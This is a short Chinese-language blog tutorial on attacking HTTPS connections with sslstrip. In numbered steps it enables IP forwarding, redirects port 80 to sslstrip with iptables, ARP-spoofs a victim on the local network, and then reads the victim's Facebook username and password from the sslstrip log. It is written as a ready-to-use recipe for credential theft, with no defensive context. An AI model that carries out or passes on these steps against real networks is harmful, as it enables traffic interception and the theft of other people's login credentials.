top of page
Search
Writer's pictureIYP

如何利用 sslstrip 对 HTTPS 连接发起中间人攻击?

🐞利用 SSLStrip 发起中间人攻击可以透明的劫持网络中的 http 流量,查找 HTTPS 链接并重定向,然后将这些链接映射到类似的 HTTP 链接中或者同形的 HTTPS 链接。怎么做?实际上非常简单……


利用 SSLStrip 发起中间人攻击可以透明地劫持网络中的 http 流量,查找 HTTPS 链接并重定向,然后将这些链接映射到类似的 HTTP 链接中或者同形的 HTTPS 链接。


它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。


step1

首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。

echo 1>/proc/sys/net/ipv4/ip_forward

step2


还需要设置 iptables,将流量从 80 端口重定向到 8080 端口,确保出站连接发送到 sslstrip 中。

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

step3


需要找到我们的网关

route -n

前三步如图所示

step4


接下来我们需要找到目标主机的 IP 地址

step5


攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。

arpspoof -i -t

step 6


现在我们打开一个新的终端并监听 8080 端口,命令如下

sslstrip -l 8080

step 7


现在我们转到受害主机中,并且在浏览器中输入 facebook.com,我们知道 Facebook 本来是使用的 HTTPS 协议,但是这里我们看到与 Facebook 是通过 http 建立的连接。

step 8


现在,返回到家目录,查看 sslstrip.log 日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:

嗯。就是这么 easy,我们就拿到了受害者的凭证。


更多 kali Linux 教程,请参考:

◾️

61 views0 comments

Comments


bottom of page